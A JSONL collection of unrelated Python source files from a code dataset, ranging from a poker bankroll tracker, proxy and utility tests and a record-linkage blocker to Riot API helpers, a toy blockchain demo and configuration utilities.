{"seq_id":"92950778","text":"#!/usr/bin/python3\nimport sqlite3\nimport time\nimport os\nimport record\nfrom time import strftime\n\nundo_cash = 666\nbb=0.00\nwhile(1):\n    #bb = 0.0\n    #blinds = [0.02, 0.05, 0.1, 0.16, 0.25, 0.5, 1, 2, 4, 6, 10, 20, 50, 100, 200, 400]\n    #while(bb not in blinds):\n        #try:\n            #bb = float(input(\"[CASH] enter big blind: \")) #0.02 0.05 0.1 0.16 0.25 0.5 1 2 4 6 10 20 50 100 200 400\n        #except ValueError:\n            #print(\"[CASH] not a valid bb\")\n            #quit()\n    try:\n        buyin = float(input(\"[CASH] enter buyin: \"))\n    except ValueError:\n        print(\"[CASH] not a valid buyin\")\n        quit()\n    if buyin < 0:\n        #undo\n        if undo_cash == 666:\n            print(\"[CASH] no undo option\")\n            quit()\n        else:\n            connection = sqlite3.connect(\"cash.db\")\n            cursor = connection.cursor()\n            cursor.execute(\"UPDATE 
stats SET balance=?\", (undo_cash,))\n            connection.commit()\n            connection.close()\n            record.undo()\n            print(\"[CASH] undo done\")\n            try:\n                buyin = float(input(\"[CASH] enter buyin: \"))\n            except ValueError:\n                print(\"[CASH] not a valid buyin\")\n                quit()\n            if buyin < 0:\n                print(\"[CASH] not a valid buyin\")\n                quit()\n    current_bankroll = record.read_rec()\n    current_bankroll -= buyin\n    time.time()\n    timestamp1 = time.time()\n    try:\n        money_left = float(input(\"[CASH] enter money left: \"))\n    except ValueError:\n        money_left = 0.0\n    timestamp2 = time.time()\n    current_bankroll = round(current_bankroll + money_left, 3)\n    record.rec(current_bankroll)\n    profit = round(money_left - buyin, 3)\n    pokertime = round((timestamp2 - timestamp1)/60,2)\n    #print(\"[CASH] time played this session: \" + str(pokertime))\n    #print(\"[CASH] profit this session: \" + str(profit))\n    connection = sqlite3.connect(\"cash.db\")\n    cursor = connection.cursor()\n    cursor.execute(\"SELECT time FROM stats\")\n    result = cursor.fetchall()\n    connection.close()\n    for r in result:\n        since = r[0]\n    pokertime = round(pokertime + since, 3)\n    connection = sqlite3.connect(\"cash.db\")\n    cursor = connection.cursor()\n    cursor.execute(\"SELECT balance FROM stats\")\n    result = cursor.fetchall()\n    connection.close()\n    for r in result:\n        cash = r[0]\n    undo_cash = cash\n    profit = round(profit + cash, 3)\n    #print(\"[CASH] played time before: \" + str(round(since, 3)))\n    #print(\"[CASH] cash before: \" + str(round(cash, 3)))\n    #print(\"[CASH] played sum: \" + str(pokertime))\n    #print(\"[CASH] cash now: \" + str(profit))\n    connection = sqlite3.connect(\"cash.db\")\n    cursor = connection.cursor()\n    cursor.execute(\"UPDATE stats SET time=?, balance=?\", (pokertime, profit,))\n    connection.commit()\n    connection.close()\n    print(strftime(\"%m/%d/%Y %H:%M\"))\n","sub_path":"cash.py","file_name":"cash.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"532638794","text":"def readrandom():\n    total = 0\n    howmany = 0\n    with open('numbers.txt') as infile:\n        for line in infile:\n            try:\n                num = int(line)\n                total += num\n                howmany += 1\n            except IOError as ercode:\n                print(\"Error:\", str(ercode))\n            except ValueError:\n                print('Error: this is not a number')\n\n    print(total/howmany)\nreadrandom()","sub_path":"python/kp2/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"568170391","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nimport os\nimport shutil\nimport unittest\nimport requests\nfrom splash.proxy import _BlackWhiteSplashProxyFactory, ProfilesSplashProxyFactory\nfrom splash.tests.test_render import BaseRenderTest\nfrom splash.tests.utils import TestServers\n\n\nclass BlackWhiteProxyFactoryTest(unittest.TestCase):\n\n    def _factory(self, **kwargs):\n        params = {\n            \"proxy_list\": [(\"proxy.crawlera.com\", 8010, \"username\", \"password\")],\n            \"whitelist\": [\n                r\".*scrapinghub\\.com.*\",\n            ],\n            \"blacklist\": [\n                r\".*\\.js\",\n                r\".*\\.css\",\n            ]\n        }\n        params.update(kwargs)\n        return _BlackWhiteSplashProxyFactory(**params)\n\n    def test_noproxy(self):\n        f = _BlackWhiteSplashProxyFactory()\n        self.assertFalse(f.shouldUseProxyList('http', 'crawlera.com'))\n\n    def test_whitelist(self):\n        self.assertUsesCustom('http://www.scrapinghub.com')\n        self.assertUsesDefault('http://www.google-analytics.com/ga.js')\n        
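# crawlera.com matches neither whitelist pattern, so the default proxy is expected\n        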
self.assertUsesDefault('http://crawlera.com')\n\n    def test_blacklist(self):\n        self.assertUsesDefault('http://www.scrapinghub.com/static/styles/screen.css')\n\n    def test_no_whitelist(self):\n        self.assertUsesCustom('http://crawlera.com', whitelist=[])\n        self.assertUsesDefault('http://www.google-analytics.com/ga.js', whitelist=[])\n\n\n    def assertUsesDefault(self, url, protocol='http', **kwargs):\n        f = self._factory(**kwargs)\n        self.assertFalse(f.shouldUseProxyList(protocol, url))\n\n    def assertUsesCustom(self, url, protocol='http', **kwargs):\n        f = self._factory(**kwargs)\n        self.assertTrue(f.shouldUseProxyList(protocol, url))\n\n\nclass BaseHtmlProxyTest(BaseRenderTest):\n    use_gzip = False  # our simple testing proxy doesn't work with gzip\n\n    def assertProxied(self, html):\n        assert 'PROXY_USED' in html\n\n    def assertNotProxied(self, html):\n        assert 'PROXY_USED' not in html\n\n\nclass HtmlProxyRenderTest(BaseHtmlProxyTest):\n\n    def test_proxy_works(self):\n        r1 = self.request({'url': self.mockurl('jsrender')})\n        self.assertNotProxied(r1.text)\n\n        r2 = self.request({'url': self.mockurl('jsrender'), 'proxy': 'test'})\n        self.assertProxied(r2.text)\n\n    def test_blacklist(self):\n        params = {'url': self.mockurl('iframes'),\n                  'proxy': 'test', 'html': 1, 'iframes': 1}\n        r = self.request(params, endpoint='render.json')\n        data = r.json()\n\n        # only 1.html is blacklisted in test.ini\n        self.assertProxied(data['html'])\n        assert any('1.html' in f['requestedUrl'] for f in data['childFrames'])\n\n        for frame in data['childFrames']:\n            if '1.html' in frame['requestedUrl']:\n                self.assertNotProxied(frame['html'])\n            else:\n                self.assertProxied(frame['html'])\n\n    def test_insecure(self):\n        r = self.request({'url': self.mockurl('jsrender'),\n                          'proxy': '../this-is-not-a-proxy-profile'})\n        self.assertStatusCode(r, 400)\n        self.assertEqual(r.text.strip(), ProfilesSplashProxyFactory.NO_PROXY_PROFILE_MSG)\n\n\n    def test_nonexisting(self):\n        r = self.request({'url': self.mockurl('jsrender'),\n                          'proxy': 'nonexisting'})\n        self.assertStatusCode(r, 400)\n        self.assertEqual(r.text.strip(), ProfilesSplashProxyFactory.NO_PROXY_PROFILE_MSG)\n\n    def test_no_proxy_settings(self):\n        r = self.request({'url': self.mockurl('jsrender'),\n                          'proxy': 'no-proxy-settings'})\n        self.assertStatusCode(r, 400)\n\n\nclass HtmlProxyDefaultProfileTest(BaseHtmlProxyTest):\n\n    def ts2_request(self, ts2, query, endpoint='render.html'):\n        url = \"http://localhost:%s/%s\" % (ts2.splashserver.portnum, endpoint)\n        return requests.get(url, params=query)\n\n    def create_default_ini(self, ts2):\n        src = os.path.join(ts2.proxy_profiles_path, 'test.ini')\n        dst = os.path.join(ts2.proxy_profiles_path, 'default.ini')\n        shutil.copyfile(src, dst)\n\n    def remove_default_ini(self, ts2):\n        dst = os.path.join(ts2.proxy_profiles_path, 'default.ini')\n        os.unlink(dst)\n\n    def test_ts_setup(self):\n        with TestServers() as ts2:\n            r1 = self.ts2_request(ts2, {'url': ts2.mockserver.url('jsrender', gzip=False)})\n            self.assertNotProxied(r1.text)\n\n            r2 = self.ts2_request(ts2, {\n                'url': ts2.mockserver.url('jsrender', gzip=False),\n                'proxy': 'test',\n            })\n            self.assertProxied(r2.text)\n\n    def test_default_profile_works(self):\n        with TestServers() as ts2:\n            self.create_default_ini(ts2)\n            try:\n                # default.ini present, proxy is used by default\n                r1 = self.ts2_request(ts2, {'url': ts2.mockserver.url('jsrender', gzip=False)})\n                self.assertProxied(r1.text)\n\n                # another proxy\n                r2 = self.ts2_request(ts2, {\n                    'url': ts2.mockserver.url('jsrender', gzip=False),\n                    'proxy': 'test',\n                })\n                
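# an explicitly requested profile should still override the default profile\n                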
self.assertProxied(r2.text)\n\n # invalid proxy profile\n r3 = self.ts2_request(ts2, {\n 'url': ts2.mockserver.url('jsrender', gzip=False),\n 'proxy': 'nonexisting',\n })\n self.assertStatusCode(r3, 400)\n\n # 'none' disables default.ini\n r4 = self.ts2_request(ts2, {\n 'url': ts2.mockserver.url('jsrender', gzip=False),\n 'proxy': 'none',\n })\n self.assertNotProxied(r4.text)\n\n # empty 'proxy' argument disables default.ini\n r5 = self.ts2_request(ts2, {\n 'url': ts2.mockserver.url('jsrender', gzip=False),\n 'proxy': '',\n })\n self.assertNotProxied(r5.text)\n\n finally:\n self.remove_default_ini(ts2)\n","sub_path":"splash/tests/test_proxy.py","file_name":"test_proxy.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"47441734","text":"from mock import Mock\nfrom thefuck.utils import sudo_support, wrap_settings\nfrom thefuck.types import Settings\nfrom tests.utils import Command\n\n\ndef test_wrap_settings():\n fn = lambda _, settings: settings\n assert wrap_settings({'key': 'val'})(fn)(None, Settings({})) \\\n == {'key': 'val'}\n assert wrap_settings({'key': 'new-val'})(fn)(\n None, Settings({'key': 'val'})) == {'key': 'new-val'}\n\n\ndef test_sudo_support():\n fn = Mock(return_value=True, __name__='')\n assert sudo_support(fn)(Command('sudo ls'), None)\n fn.assert_called_once_with(Command('ls'), None)\n\n fn.return_value = False\n assert not sudo_support(fn)(Command('sudo ls'), None)\n\n fn.return_value = 'pwd'\n assert sudo_support(fn)(Command('sudo ls'), None) == 'sudo pwd'\n\n assert sudo_support(fn)(Command('ls'), None) == 'pwd'\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"390052781","text":"testes = int(input())\n\nfor teste in range(testes):\n hora, minuto, ocorrencia = list(map(int, input().split()))\n\n if hora < 10:\n hora = \"0\" + str(hora)\n\n if minuto < 10:\n minuto = \"0\" + str(minuto)\n\n if ocorrencia == 1:\n print(\"%s:%s - A porta abriu!\" % (hora, minuto))\n else:\n print(\"%s:%s - A porta fechou!\" % (hora, minuto))\n","sub_path":"URI Online Judge - Beecrowd/Python 3/2152 - Pepe, Já Tirei a Vela! - Python 3.py","file_name":"2152 - Pepe, Já Tirei a Vela! 
- Python 3.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"420882848","text":"import logging\n\nimport numpy as np\n\nimport skrough.typing as rght\nfrom skrough.algorithms.key_names import (\n CONFIG_CHAOS_FUN,\n CONFIG_DAAR_ALLOWED_RANDOMNESS,\n CONFIG_DAAR_PROBES_COUNT,\n VALUES_GROUP_INDEX,\n VALUES_X,\n VALUES_X_COUNTS,\n VALUES_Y,\n VALUES_Y_COUNT,\n)\nfrom skrough.attrs_checks import check_if_attr_better_than_shuffled\nfrom skrough.logs import log_start_end\nfrom skrough.structs.state import ProcessingState\n\nlogger = logging.getLogger(__name__)\n\n\nDEFAULT_DAAR_SMOOTHING_PARAMETER = 1\n\n\n@log_start_end(logger)\ndef filter_hook_attrs_first_daar(\n state: ProcessingState,\n elements: rght.Elements,\n) -> rght.Elements:\n daar_probes_count = state.config[CONFIG_DAAR_PROBES_COUNT]\n logger.debug(\"Param daar_probes_count == %d\", daar_probes_count)\n daar_allowed_randomness = state.config[CONFIG_DAAR_ALLOWED_RANDOMNESS]\n logger.debug(\"Param daar_allowed_randomness == %f\", daar_allowed_randomness)\n chaos_fun = state.config[CONFIG_CHAOS_FUN]\n\n group_index = state.values[VALUES_GROUP_INDEX]\n x = state.values[VALUES_X]\n x_counts = state.values[VALUES_X_COUNTS]\n y = state.values[VALUES_Y]\n y_count = state.values[VALUES_Y_COUNT]\n result = []\n for attr in elements:\n logger.debug(\"Check if attr <%d> is better than shuffled\", attr)\n if check_if_attr_better_than_shuffled(\n group_index=group_index,\n attr_values=x[:, attr],\n attr_values_count=x_counts[attr],\n values=y,\n values_count=y_count,\n probes_count=daar_probes_count,\n allowed_randomness=daar_allowed_randomness,\n chaos_fun=chaos_fun,\n rng=state.rng,\n ):\n logger.debug(\n \"Attr <%d> is better than shuffled with respect to allowed_randomness\",\n attr,\n )\n result.append(attr)\n break # in this version we finish whenever the first one is found\n return np.asarray(result)\n","sub_path":"src/skrough/algorithms/hooks/filter_hooks.py","file_name":"filter_hooks.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"603214587","text":"import logging\nimport pandas as pd\nimport numpy as np\n\nfrom blocker import Blocker\nfrom magellan.core.mtable import MTable\nfrom magellan.core.mcandset import MCandset\n\nlogger = logging.getLogger(__name__)\n\nclass AttrEquivalenceBlocker(Blocker):\n\n def block_tables(self, left, right, left_on, right_on, left_output_colnames=None, right_output_colnames=None):\n left_output_colnames, right_output_colnames = check_columns(left, right, left_on, right_on,\n left_output_colnames, right_output_colnames)\n\n mleft, mright = rem_nans(left, right, left_on, right_on)\n candset = pd.merge(mleft, mright, left_on=left_on, right_on=right_on, suffixes=('_left', '_right'))\n\n ret_cols, fin_cols = out_cols(left.get_key(), right.get_key(), list(candset.columns),\n left_output_colnames, right_output_colnames)\n\n candset = candset[ret_cols]\n candset.columns = fin_cols\n candset = MTable(candset)\n # note the special syntax here\n candset._MTable__set_key(None)\n candset = MCandset(candset, left, right)\n return candset\n\n def block_tuples(self, left, right, left_on, right_on):\n return tuple(left[left_on]) == tuple(right[right_on])\n\n def block_candset(self, candset, left_on, right_on, inplace=False):\n if not isinstance(candset, MCandset):\n raise TypeError('Input should be of type MCandset')\n\n if 
inplace is False:\n            candset = candset.copy()\n\n        left = candset.left_table\n        right = candset.right_table\n        table = candset.candset_table\n        # Calling check_columns: bit of overkill because left and right output cols are not part of input\n        check_columns(left, right, left_on, right_on, None, None)\n\n        # construct key strings that can be queried in the candidate set table.\n        key_l = 'left.' + left.get_key()\n        key_r = 'right.' + right.get_key()\n        valid = []\n        for idx, row in table.iterrows():\n            val_l = row[key_l]\n            val_r = row[key_r]\n            t_l = tuple(left.ix[val_l, left_on])\n            t_r = tuple(right.ix[val_r, right_on])\n            # NaN never compares equal to itself, so missing join values are detected explicitly\n            if any(pd.isnull(v) for v in t_l) or any(pd.isnull(v) for v in t_r):\n                valid.append(False)\n            elif t_l == t_r:\n                valid.append(True)\n            else:\n                valid.append(False)\n        candset.candset_table = table[valid]\n        return candset\n\n\n# helper functions\n\ndef out_cols(left_id, right_id, cand_cols, left_output_colnames, right_output_colnames):\n    left_id = [left_id]\n    right_id = [right_id]\n    ret_cols = []\n    # retain columns from merge\n    ret_id_left = [retain_names(x, cand_cols, '_left') for x in left_id]\n    ret_id_right = [retain_names(x, cand_cols, '_right') for x in right_id]\n    ret_cols.extend(ret_id_left)\n    ret_cols.extend(ret_id_right)\n\n    ret_left_col = [retain_names(x, cand_cols, '_left') for x in left_output_colnames]\n    ret_right_col = [retain_names(x, cand_cols, '_right') for x in right_output_colnames]\n    ret_cols.extend(ret_left_col)\n    ret_cols.extend(ret_right_col)\n\n    # final columns in the output\n    fin_cols = []\n    fin_id_left = [final_names(x, 'left.') for x in left_id]\n    fin_id_right = [final_names(x, 'right.') for x in right_id]\n    fin_cols.extend(fin_id_left)\n    fin_cols.extend(fin_id_right)\n\n    fin_left_col = [final_names(x, 'left.') for x in left_output_colnames]\n    fin_right_col = [final_names(x, 'right.') for x in right_output_colnames]\n    fin_cols.extend(fin_left_col)\n    fin_cols.extend(fin_right_col)\n\n    return ret_cols, fin_cols\n\ndef flatten_list(inp_list):\n    return [item for sublist in inp_list for item in sublist]\n\ndef final_names(inp_name, prefix):\n    name_str = str(inp_name)\n    name_str = prefix + name_str\n    return name_str\n\ndef check_columns(left, right, left_on, right_on, left_output_colnames, right_output_colnames):\n    # check keys are set\n    assert left.get_key() is not None, 'Key is not set for left table'\n    assert right.get_key() is not None, 'Key is not set for right table'\n    # check left_on, right_on form a subset of left and right tables\n    assert set(left_on).issubset(left.columns) is True, 'Left join attribute is not in left table columns'\n    assert set(right_on).issubset(right.columns) is True, 'Right join attribute is not in right table columns'\n    if left_output_colnames is None:\n        left_output_colnames = left.columns\n    if right_output_colnames is None:\n        right_output_colnames = right.columns\n    assert set(left_output_colnames).issubset(left.columns) is True, 'Left output columns do not form a ' \\\n                                                                     'subset of left table columns'\n    assert set(right_output_colnames).issubset(right.columns) is True, 'Right output columns do not form a ' \\\n                                                                       'subset of right table columns'\n    left_output_colnames = sorted(set(left_output_colnames) - set([left.get_key()]))\n    right_output_colnames = sorted(set(right_output_colnames) - set([right.get_key()]))\n    return left_output_colnames, right_output_colnames\n\ndef retain_names(inp_name, colnames, suffix):\n    if inp_name in colnames:\n        return inp_name\n    else:\n        name_str = str(inp_name)\n        name_str += suffix\n        return name_str\n\ndef rem_nans(left, right, 
left_on, right_on):\n #ind = (np.where(wal['isbn'].notnull())[0])\n # get the index values at which the value is not nan\n lists_l = [list(left.index.values[np.where(left[x].notnull())[0]]) for x in left_on]\n lists_l = sorted(set.intersection(*map(set, lists_l)))\n #lists_r = [list(right[x]) for x in right_on]\n lists_r = [list(right.index.values[np.where(right[x].notnull())[0]]) for x in right_on]\n lists_r = sorted(set.intersection(*map(set, lists_r)))\n mleft = left.ix[lists_l]\n mright = right.ix[lists_r]\n return mleft, mright\n\n\n\n","sub_path":"magellan/blocker/attr_equiv_blocker.py","file_name":"attr_equiv_blocker.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"123494510","text":"#file containing functions that use riot api calls\n\nimport os\nimport requests\n\nfrom dotenv import load_dotenv \n\n#load riot api token from .env file\nload_dotenv()\ntoken = os.getenv('RIOT_TOKEN')\n\ndef game(summoner_name):\n\n request_summonerID = v4_summoners(summoner_name)\n if request_summonerID.status_code == 200:\n\n summonerID = request_summonerID.json()['id']\n request_match_info = v4_active_games(summonerID)\n\n if request_match_info.status_code == 200:\n\n match_info = request_match_info.json()\n blue_side = 'Blue Side: \\n \\n'\n red_side = 'Red Side: \\n \\n' \n\n for summoners in match_info['participants']:\n \n if summoners['teamId'] == 100:\n \n blue_side = blue_side + ' ' + summoners['summonerName'] + ' ' + get_champion_by_ID(summoners['championId']) + ' ' + get_soloq_rank(summoners['summonerId']) + ' \\n'\n\n else:\n\n red_side = red_side + ' ' + summoners['summonerName'] + ' ' + get_champion_by_ID(summoners['championId']) + ' ' + get_soloq_rank(summoners['summonerId']) + ' \\n' \n \n game_info = blue_side + '\\n' + red_side\n\n return game_info\n \n else:\n\n return 'Your requested summoner is currently not in-game.'\n\n\n elif request_summonerID.status_code == 404:\n\n return 'The requested summoner does not exist.'\n\n else:\n\n print(request_summonerID.status_code)\n return 'The servers of riot are boosted just like your teammates. 
Try again later!'\n\n\ndef v4_summoners(summoner_name):\n    return requests.get('https://euw1.api.riotgames.com/lol/summoner/v4/summoners/by-name/' + summoner_name + '?api_key=' + token)\n\n\ndef v4_active_games(summoner_ID):\n    return requests.get('https://euw1.api.riotgames.com/lol/spectator/v4/active-games/by-summoner/' + summoner_ID + '?api_key=' + token)\n\n\ndef get_soloq_rank(summoner_ID):\n    '''\n    Returns a string in the format TIER RANK LP WINS-LOSSES,\n    e.g. GOLD II 68LP 46-43\n    '''\n    r = requests.get('https://euw1.api.riotgames.com/lol/league/v4/entries/by-summoner/' + summoner_ID + '?api_key=' + token)\n    json_file = r.json()\n\n    if not json_file:\n        return 'Not ranked in yet.'\n\n    for entry in json_file:\n        if entry['queueType'] == 'RANKED_SOLO_5x5':\n            return entry['tier'] + ' ' + entry['rank'] + ' ' + str(entry['leaguePoints']) + 'LP ' + str(entry['wins']) + '-' + str(entry['losses'])\n\n    return 'Not ranked in yet.'\n\n\ndef get_champion_by_ID(champion_ID):\n    # get the name of a champion given its ID\n    champion_ID = str(champion_ID)\n    r = requests.get('http://ddragon.leagueoflegends.com/cdn/10.4.1/data/en_US/champion.json')\n\n    data = r.json()['data']\n    for name in data:\n        if data[name]['key'] == champion_ID:\n            return name","sub_path":"riot_api_calls.py","file_name":"riot_api_calls.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"439112076","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask\nimport json\nfrom db import *\nfrom screen_control import compare_time\n\napp = Flask(__name__, static_url_path='')\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n    page = ''\n    return page\n\n\n@app.route('/getJobs', methods=['POST', 'GET'])\ndef get_jobs():\n    # the request must not take too long, or it will throw off the time comparison\n    compare_time()\n    jobs_list = query_by_date()\n    jobs_dic_list = []\n    for job in jobs_list:\n        job_dic = {'job_name': job[1], 'job_company': job[2], 'job_salary': job[4]}\n        jobs_dic_list.append(job_dic)\n    return json.dumps(jobs_dic_list)\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0')\n","sub_path":"huanhuan2.0.py","file_name":"huanhuan2.0.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"344107722","text":"from Blockchainclass import BlockChain\nfrom Blockclass import Block\n\npycoin = BlockChain()\npycoin.addBlock(Block(1, 'amount: 4'))\npycoin.addBlock(Block(2, 'amount: 33'))\n# tamper with a mined block and recompute only its own hash\npycoin.chain[1].data = 'amount : 1000'\npycoin.chain[1].hash = pycoin.chain[1].calculateHash()\nfor i in pycoin.chain:\n\ti.showblock()\n
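# the next block still stores the old hash, so the chain should no longer validate\n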
\" + str(pycoin.isChainValid()) );\n","sub_path":"2_simple_blockchain_with_validation/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"156790618","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\nfrom ctc_beam_search_decoder import *\nimport time\n\nvocab_list = ['\\'', ' ']+[chr(i) for i in range(97, 101)]\n#vocab_list = ['\\'', ' ']+[chr(i) for i in range(97, 123)]\n\ndef generate_probs(num_time_steps, probs_dim):\n probs_mat = np.random.random(size=(num_time_steps, probs_dim))\n probs_mat = [probs_mat[index]/sum(probs_mat[index]) for index in range(num_time_steps)]\n return probs_mat\n\ndef test_beam_search_decoder():\n max_time_steps = 6\n probs_dim = len(vocab_list)+1\n beam_size = 20\n num_results_per_sample = 1\n \n input_prob_matrix_0 = np.asarray(generate_probs(max_time_steps, probs_dim), dtype=np.float32)\n print(input_prob_matrix_0)\n # Add arbitrary offset - this is fine\n input_log_prob_matrix_0 = np.log(input_prob_matrix_0) #+ 2.0\n\n # len max_time_steps array of batch_size x depth matrices\n inputs = ([\n input_log_prob_matrix_0[t, :][np.newaxis, :] for t in range(max_time_steps)]\n )\n\n inputs_t = [ops.convert_to_tensor(x) for x in inputs]\n inputs_t = array_ops.stack(inputs_t)\n \n # run CTC beam search decoder in tensorflow\n with tf.Session() as sess:\n decoded, log_probabilities = tf.nn.ctc_beam_search_decoder(inputs_t,[max_time_steps],beam_width=beam_size,top_paths=num_results_per_sample,merge_repeated=False)\n tf_decoded = sess.run(decoded)\n tf_log_probs = sess.run(log_probabilities) \n \n\n # run original CTC beam search decoder \n beam_result = ctc_beam_search_decoder(\n\t\t\tprobs_seq=input_prob_matrix_0,\n\t\t\tbeam_size=beam_size,\n vocabulary=vocab_list,\n blank_id=len(vocab_list),\n cutoff_prob=1.0, \n\t\t\t)\n \n # run log- CTC beam search decoder \n beam_result_log = ctc_beam_search_decoder_log(\n\t\t\tprobs_seq=input_prob_matrix_0,\n\t\t\tbeam_size=beam_size,\n vocabulary=vocab_list,\n blank_id=len(vocab_list), \n cutoff_prob=1.0, \n\t\t\t)\n # compare decoding result\n print(\"{tf-decoder log probs} \\t {org-decoder log probs} \\t{log-decoder log probs}: {tf_decoder result} {org_decoder result} {log-decoder result}\")\n for index in range(num_results_per_sample):\n tf_result = ''.join([vocab_list[i] for i in tf_decoded[index].values])\n print(('%6f\\t%f\\t%f: ') % (tf_log_probs[0][index], beam_result[index][0], beam_result_log[index][0]), \n tf_result,'\\t', beam_result[index][1], '\\t', beam_result_log[index][1])\n\nif __name__ == '__main__':\n test_beam_search_decoder()\n","sub_path":"test_ctc_beam_search_decoder.py","file_name":"test_ctc_beam_search_decoder.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"159039153","text":"def processNewTime(newTime, knownTimes):\n for oldTime in knownTimes:\n #Check for overrlap\n if newTime[1] >= oldTime[0] and newTime[0] <= oldTime[1]:\n oldTime[0] = min(oldTime[0], newTime[0])\n oldTime[1] = max(oldTime[1], newTime[1])\n break\n else: # Add if the list is empty\n knownTimes.append(list(newTime))\n\nif __name__ == \"__main__\":\n # Input as list of tuples\n # Requires \"input.txt\" to contain the input\n times 
for pair in open(\"input.txt\", \"r\").read().split(\"\\n\"):\n        if pair.strip():\n            times.append(tuple(int(time) for time in pair.split()))\n\n    # Process each time\n    knownIntervals = []\n    for time in times:\n        processNewTime(time, knownIntervals)\n\n    # merge any overlap left between the collected intervals themselves\n    finalList = []\n    for pair in knownIntervals:\n        processNewTime(pair, finalList)\n\n    total = 0  # Find the number of hours on\n    for time in finalList:\n        total += time[1] - time[0]\n\n    print(total)\n","sub_path":"Small Challenges/Daily Programmer/20180115_Light.py","file_name":"20180115_Light.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"423783344","text":"from javax.servlet.http import Cookie\r\nfrom cn.edustar.jitar.util import ParamUtil\r\n\r\nclass admin_feed_list:\r\n    def __init__(self):\r\n        self.params = ParamUtil(request)\r\n\r\n    def execute(self):\r\n        pwd = self.params.safeGetStringParam(\"pwd\")\r\n        self.feedbackService = __spring__.getBean(\"feedbackService\")\r\n        if pwd != \"\":\r\n            if self.feedbackService.getUserData() == pwd:\r\n                self.saveToCookie()\r\n\r\n        if self.getCookie() == \"\":\r\n            return \"/WEB-INF/ftl/admin/admin_feed_nothing.ftl\"\r\n        if request.getMethod() == \"POST\":\r\n            self.delete()\r\n        feedlist = self.feedbackService.getAllFeedbackList()\r\n        request.setAttribute(\"feedlist\", feedlist)\r\n        return \"/WEB-INF/ftl/admin/admin_feed_list.ftl\"\r\n\r\n    def delete(self):\r\n        guids = self.params.safeGetIntValues(\"guid\")\r\n        for g in guids:\r\n            f = self.feedbackService.getFeedbackById(g)\r\n            if f is not None:\r\n                self.feedbackService.deleteFeedback(f)\r\n\r\n    def saveToCookie(self):\r\n        namecookie = Cookie(\"m\", \"m\")\r\n        namecookie.setMaxAge(300)\r\n        namecookie.setPath(\"/\")\r\n        response.addCookie(namecookie)\r\n\r\n    def getCookie(self):\r\n        cookie = \"\"\r\n        cookies = request.getCookies()\r\n        if cookies is None:\r\n            return cookie\r\n        for c in cookies:\r\n            if c.getName() == \"m\":\r\n                cookie = c.getValue()\r\n        return cookie","sub_path":"WebContent/manage/admin_feed_list.py","file_name":"admin_feed_list.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"328015087","text":"import logging\nimport os\nimport shutil\nimport yaml\n\nfrom concreate.errors import ConcreateError\n\ntry:\n    import ConfigParser as configparser\nexcept ImportError:\n    import configparser\n\nlogger = logging.getLogger('concreate')\n\ncfg = {}\n\n\ndef get_cfg(config_path):\n    \"\"\"Returns configuration from concreate config file and prepares sensible defaults\n\n    params:\n      config_path - path to a concreate config file (expanding user)\n    \"\"\"\n    cp = configparser.ConfigParser()\n    cp.read(os.path.expanduser(config_path))\n    cfg = cp._sections\n    cfg['common'] = cfg.get('common', {})\n    cfg['common']['work_dir'] = cfg.get('common').get('work_dir', '~/.concreate.d')\n    return cfg\n\n\ndef cleanup(target):\n    \"\"\" Prepares the target/image directory to be regenerated.\"\"\"\n    dirs_to_clean = [os.path.join(target, 'image', 'modules'),\n                     os.path.join(target, 'image', 'repos'),\n                     os.path.join(target, 'repo')]\n    for d in dirs_to_clean:\n        if os.path.exists(d):\n            logger.debug(\"Removing dirty directory: '%s'\" % d)\n            shutil.rmtree(d)\n\n\ndef load_descriptor(descriptor):\n    \"\"\" Parses a descriptor and validates it against the requested schema type\n\n    Args:\n      descriptor - yaml descriptor or path to a descriptor to be loaded\n\n    Returns descriptor as a dictionary\n    \"\"\"\n    
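# a path that does not exist means the argument itself is inline YAML content\n    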
